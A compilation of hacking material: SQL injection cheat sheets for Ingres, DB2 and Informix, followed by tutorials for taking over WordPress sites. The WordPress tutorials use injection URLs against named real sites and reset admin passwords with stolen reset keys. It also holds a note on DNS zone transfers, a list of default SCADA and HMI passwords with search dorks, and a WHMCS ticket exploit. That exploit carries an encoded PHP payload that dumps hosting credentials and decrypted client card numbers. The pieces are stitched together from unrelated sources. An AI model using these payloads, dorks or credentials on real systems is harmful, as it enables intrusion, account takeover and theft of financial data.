List Privilegesselect dbmsinfo(db_admin);select dbmsinfo(create_table);select dbmsinfo(create_procedure);select dbmsinfo(security_priv);select dbmsinfo(select_syscat);select dbmsinfo(db_privileges);select dbmsinfo(current_priv_mask);

List DBA AccountsTODO

Current Databaseselect dbmsinfo(database);

List DatabasesSELECT name FROM iidatabase; connect to iidbdb

List Columnsselect column_name, column_datatype, table_name, table_owner from iicolumns;

List Tablesselect table_name, table_owner from iitables;select relid, relowner, relloc from iirelation;select relid, relowner, relloc from iirelation where relowner != $ingres;

Find Tables From Column NameSELECT table_name, table_owner FROM iicolumns WHERE column_name = value

Select Nth RowAstoundingly, this doesntseem to be possible! This is as close as you can get:select top 10 blah from table;select first 10 blah form table;

Select Nth Charselect substr(abc, 2, 1); returns b

Bitwise ANDThe function bit_and exists, but seems hard to use. Heres anexample of ANDing 3 and 5 together. The result is a byte typewith value ?01:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> CharTODO

Char -> ASCII ValueTODO(The ascii function exists, but doesnt seem to do what Id expect.)

Castingselect cast(123 as varchar);select cast(123 as integer);

String Concatenationselect abc || def;

If StatementTODO

Case StatementTODO

Avoiding QuotesTODO

Time Delay???See Heavy Queries article for some ideas.

Make DNS RequestsTODO

Command ExecutionImpossible?

Local File AccessTODO

Hostname, IP AddressSELECT dbmsinfo(ima_server)

Location of DB filesSELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = value primary location of dbSELECT lname FROM iiextend WHERE dname = value extended location of dbSELECT are FROM iilocations where lname = value all area (ie directory) linked with a location

Default/System DatabasesSELECT name FROM iidatabase WHERE own = $ingres connect to iidbdb

Installing LocallyThe Ingres database can be downloaded for free from http://esd.ingres.com/A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832

Database ClientTODOThere is a client called sql which can be used for local connections (at least) in the database server package above.

Logging in from command line$ su - ingres$ sql iidbdb* select dbmsinfo(_version); go

Identifying on the networkTODO

The following areas are interesting enough to include on this page, but I havent researched them for other databases:DescriptionSQL / Comments

Batching Queries Allowed?Not via DBI in PERL. Subsequent statements seem to get ignored:select blah from table where foo = 1; select doesnt matter this is ignored.

FROM clause mandated in SELECTs?No. You dont need to select form dual or anything. The following is legal:select 1;

UNION supportedYes. Nothing tricky here. The following is legal:select 1 union select 2;

Enumerate Tables Privsselect table_name, permit_user, permit_type from iiaccess;

Length of a stringselect length(abc); returns 3

Roles and passwordsFirst you need to connect to iidbdb, then:select roleid, rolepass from iirole;

List Database ProceduresFirst you need to connect to iidbdb, then:select dbp_name, dbp_owner from iiprocedure;

Create Users + Granting PrivsFirst you need to connect to iidbdb, then:create user pm with password = password;grant all on current installation to pm;

DB2 SQL Injection Cheat SheetFinding a SQL injection vulnerability in a web application backed by DB2 isnt too common in my experience. When you do find one, though it pays to be preparedBelow are some tabulated notes on how to do many of thing youd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.This post is part of series of SQL Injection Cheat Sheets. In this series, Ive endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that dont apply and also areas that I havent got round to researching yet.The complete list of SQL Injection Cheat Sheets Im working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 InformixIm not planning to write one for MS Access, but theres a great MS Access Cheat Sheet here.Some of the queries in the table below can only be run by an admin. These are marked with priv at the end of the query.Versionselect versionnumber, version_timestamp from sysibm.sysversions;

Commentsselect blah from foo; comment like this

Current Userselect user from sysibm.sysdummy1;select session_user from sysibm.sysdummy1;select system_user from sysibm.sysdummy1;

List UsersN/A (I think DB2 uses OS-level user accounts for authentication.)Database authorities (like roles, I think) can be listed like this:select grantee from syscat.dbauth;

List Password HashesN/A (I think DB2 uses OS-level user accounts for authentication.)

List Privilegesselect * from syscat.tabauth; privs on tablesselect * from syscat.dbauth where grantee = current user;select * from syscat.tabauth where grantee = current user;select * from SYSIBM.SYSUSERAUTH List db2 system privilegies

List DBA Accountsselect name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = Y or SYSADMAUTH = G

Current Databaseselect current server from sysibm.sysdummy1;

List DatabasesSELECT schemaname FROM syscat.schemata;

List Columnsselect name, tbname, coltype from sysibm.syscolumns;

List Tablesselect name from sysibm.systables;

Find Tables From Column Nameselect tbname from sysibm.syscolumns where name=username

Select Nth Rowselect name from (SELECT name FROM sysibm.systables order byname fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth CharSELECT SUBSTR(abc,2,1) FROM sysibm.sysdummy1; returns b

Bitwise ANDThis page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Charselect chr(65) from sysibm.sysdummy1; returns A

Char -> ASCII Valueselect ascii(A) from sysibm.sysdummy1; returns 65

CastingSELECT cast(123 as integer) FROM sysibm.sysdummy1;SELECT cast(1 as char) FROM sysibm.sysdummy1;

String ConcatenationSELECT a concat b concat c FROM sysibm.sysdummy1; returns abcselect a || b from sysibm.sysdummy1; returns ab

Informix SQL Injection Cheat SheetSome useful syntax reminders for SQL Injection into Informix databasesBelow are some tabulated notes on how to do many of thing youd normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here.This post is part of series of SQL Injection Cheat Sheets. In this series, Ive endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that dont apply and also areas that I havent got round to researching yet.The complete list of SQL Injection Cheat Sheets Im working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 InformixIm not planning to write one for MS Access, but theres a great MS Access Cheat Sheet here.VersionSELECT DBINFO(version, full) FROM systables WHERE tabid = 1;SELECT DBINFO(version, server-type) FROM systables WHERE tabid = 1;SELECT DBINFO(version, major), DBINFO(version, minor), DBINFO(version, level) FROM systables WHERE tabid = 1;SELECT DBINFO(version, os) FROM systables WHERE tabid = 1; T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix

Commentsselect 1 FROM systables WHERE tabid = 1; comment

Current UserSELECT USER FROM systables WHERE tabid = 1;select CURRENT_ROLE FROM systables WHERE tabid = 1;

List Usersselect username, usertype, password from sysusers;

List Password HashesTODO

List Privilegesselect tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; which tables are accessible by which usersselect procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; which procedures are accessible by which users

List DBA AccountsTODO

Current DatabaseSELECT DBSERVERNAME FROM systables where tabid = 1; server name

List Databasesselect name, owner from sysdatabases;

List Columnsselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;

List Tablesselect tabname, owner FROM systables;select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;

List Stored Proceduresselect procname, owner FROM sysprocedures;

Find Tables From Column Nameselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like %pass%;

Select Nth Rowselect first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; selects the 10th row

Select Nth CharSELECT SUBSTRING(ABCD FROM 3 FOR 1) FROM systables where tabid = 1; returns C

Bitwise ANDselect bitand(6, 1) from systables where tabid = 1; returns 0select bitand(6, 2) from systables where tabid = 1; returns 2

ASCII Value -> CharTODO

Char -> ASCII Valueselect ascii(A) from systables where tabid = 1;

Castingselect cast(123 as integer) from systables where tabid = 1;select cast(1 as char) from systables where tabid = 1;

String ConcatenationSELECT A || B FROM systables where tabid = 1; returns ABSELECT concat(A, B) FROM systables where tabid = 1; returns AB

String LengthSELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;

If StatementTODO

Case Statementselect tabid, case when tabid>10 then High else Low end from systables;

Avoiding QuotesTODO

Time DelayTODO

Make DNS RequestsTODO

Command ExecutionTODO

Local File AccessTODO

Hostname, IP AddressSELECT DBINFO(dbhostname) FROM systables WHERE tabid = 1; hostname

Location of DB filesTODO

Default/System DatabasesThese are the system databases:sysmastersysadmin*sysuser*sysutils*

* = dont seem to contain anything / dont allow readingInstalling LocallyYou can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.Database ClientTheres a database client SDK available, but I couldnt get the demo client working.I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (emerge dev-java/jdbc-informix on Gentoo).Logging in from command lineIf you get local admin rights on a Windows box and have a GUI logon: Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly. Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.The following were set on my test system. This may help if you get command line access, but cant get a GUI youll need to change testservername:set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50set INFORMIXSERVER=testservernameset ONCONFIG=ONCONFIG.testservernameset PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program FilesIBMInformixClien-SDKbin;C:Program Filesibmgsk7bin;C:Program Filesibmgsk7libset CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMIBMINF~111.50xtendkrakatoajdbc.jar;set DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmpset CLIENT_LOCALE=EN_US.CP1252set DB_LOCALE=EN_US.8859-1set SERVER_LOCALE=EN_US.CP1252set DBLANG=EN_US.CP1252mode con codepage select=1252Identifying on the networkMy default installation listened on two TCP ports: 9088 and 9099. When I created a new server name, this listened on 1526/TCP by default. Nmap 4.76 didnt identify these ports as Informix:$ sudo nmap -sS -sV 10.0.0.1 -p- -v version-all1526/tcp open pdap-np?9088/tcp open unknown9089/tcp open unknownTODO How would we identify Informix listening on the network?

WordPress Hacking TricksI. Hacking WordPress .. (Without Cracking the hashes) you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012Things u need 1) any wordpress sqli dork .. (u can get it from exploit-db.com)2) knowledge of sqli .. (coz this thread is not about sqli)Lets Start ,1) My DorkThere are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect.. and the google dork for it is .. Code : inurl:"/?fbconnect_action=myhome" now paste this code in google.com (one of my best frnds)and u will see no. of vulnerable websites .. 2) now the website im going to use here is .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2 > here the parameter userid is vulnerable to sqli ..> so lets see what we can get from the data base .. > im going to change the above URL with this Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)?,7,8,9,10,11,12+from+wp_users-- > now u can see we got the username with the email id ..> now if i change the above URL to this .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),?7,8,9,10,11,12+from+wp_users-- > im going to get the user name and the hashed password ..> (point to be noted here .. im using concat here .. u can also use group_concat to get all the users..> again .. that would be ur knowledge how u use sqli) > now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5)> and are very hard to crack .. > but if ur mad .. u should think out of the box .. > so now follow the steps .. a) go to the login page of of wordpress site .. in my case that would be .. Code : http://masaru.ikeda.me/wp-login.phpb) click on Lost your password ?c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username ..d) now look closely .. it says .. "Check your e-mail for the confirmation link."e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key .. f) so now im going to change my URL to this .. to get the activation key .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa?tion_key),7,8,9,10,11,12+from+wp_users-- NOTE: we got the activation key here .. u should note it down somewhere ..g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL ..Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be .. Code : http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru and VOILA .. the wordpress will ask u for ur new password ..now go the login page again .. and try the new password .. and there u go .. u got access to the panel ..now u know how to shell the wordpress site .. don't u ?? Trick for those .. who are actually MAD:1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. > goto the login page and see .. if there is an option there to go back to the main page of the blog.. > like in my case see the option .. if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me .. 2) once u have shelld the website .. > get the database details .. > use any database connector .. > go to the table .. wp_user .. and in the column wp_pass .. > replace the hash with the one u got in the very beginning .. > the actual hash of the admin .. now the password will be again what it was before .. > as nothing happened .. admin will never know what hit 'em .. Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..

How To Hack WordPress Websites using SQL Injection:Hacking Tutorial 5 comments Tutorial:How To Hack WordPress Websites using SQL injectionWhat is Wordpress??WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system. WordPress is currently the most popular blogging system in use on the Web.It was first released on May 27, 2003, by founders Matt Mullenweg.Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli Vulnerability..1>First we will find a Target using a Google dork inurl:all-video-gallery/config.php?vid=

click on image for better preview.......

2>Open any website.... In my case its juangrial.com.

3>now lets do a sql injection....copy the exploit code then hit enter then see the Magic...:)Exploit Code for finding usename &password: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

You can also try this.......well Both will work the same.........Exploit Code for finding usename &email: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-

-

4>We Got admin Email......Now Let!s reset it.....

For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php "Then click on Lost Password"

5>Enter the Email we Got IN earlier steps...

6>Now come back and go to activation table....* Exploit Code for activation Key: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

7>yeah!!!we got what we need now lets change the admin password...goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username

8> Now open http://site.com/wp-admin

and Login with new password..........xD

DNS Zone Transfer Vulnerability Exploit

Scan website with Acunetix Web Vulnerability Scanner. If you get DNS zone transfer vulnerability

Open command prompt (run>cmd) do nslookup. type > ns lookup type > server

C:\> set type-any C:\> ls -d

Hacking SCADA SystemsWith the discovery of stuxnet and all the subsequent interest in industrial control systems it's worthwhile to learn a bit on how to exploit these for our own purposes. For now it's a copypaste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research.Contents :- Terminology Default Passwords Google Dorks Vulnerabilities and Other ResourcesTerminology :PLC: Programmable Logic ControllerRTU: Remote Terminal UnitHMI: Human-Machine InterfaceDefault Passwords :These should always be your first try if you come across an HMI listed. Due to the fact that the amount of attention these systems have received has only been true recently many of these HMIs still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems.Schneider Electrics :pcfactory:pcfactoryloader:fwdownloadntpupdate:ntpupdatesysdiag:factorycast@schneidertest:testingpwUSER:USERUSER:USERUSER webserver:webpagesfdrusers:sresurdfnic2212:poiuypoiuynimrohs2212:qwertyqwertynip2212:fcsdfcsdftpuser:ftpusernoe77111_v500:RcSyyebczSAUTCSE:RybQRceeSdAUT_CSE:cQdd9debeztarget:RcQbRbzRycSiemens Simatic :Administrator:100 Siemens WinCC :WinCCConnect:2WSXcderWinCCAdmin:2WSXcderWAGO :admin:wagoGoogle Dorks :These will be added to as I go along, but are just a couple you can try out to search for HMIs.inurl:/plc/webvisu.htm"Miniweb on" "Control Functions" -filetype:pdf Vulnerabilities and Other ResourcesVulnerabilities in some SCADA server softwares Metasploit Modules for SCADA-related Vulnerabilities SIMATIC HMI panels - some default Simatic HMIs you can play around withWHMCS Hacking with Sumbit Ticket exploit

Hi Mates !Today we are going to learn, how to HackWHMCS or you can say its submit ticketexploit ,through which we will we will get thecpanel username and password of hosting paneland website hosted on that whmcs.lets startstep 1: Get a website which provide hosting and find out the option " submit ticket"step 2 : now open submit ticket option and click on sales department

step 3 : now we have to fill the followinginfo like "name , email address, urgencyput any random info is these fieldsand main thing issubject filed"

fill this code in subject field :

{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICdyb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb21haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjYXJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJGNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjdCBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbnVtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUVTX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFFU19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiANCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw=='));exit;{/php}______________________________________________________________________________

and scroll downfill the Captchaclick the submit button

we will be redirected to next page where it will showcpanel username and passwordboom !you have cpanel usernames and passwords of hosting panel,website hosted on that server if you are lucky , you may also get the FTP and SMTP passwords too !

ok it was all about the the cpanel,FTP and SMTP passwords if whmcs dont have any website hosted on it you wont get anythingthen ????????dont be sad :)we have one more trick and this will help you toupload the shell on whmcs website :)how ???lets move :)come back to the submit ticket pageput any random info in email,name and urgency fieldmain step is to put the php code in subject fieldthis time we are going to put the php code, if it got executed successfullywe will get a uploader on the website through which we will be able to upload shell on the websiteso lets start

fill the any random info in other fields and put this php code in subject field

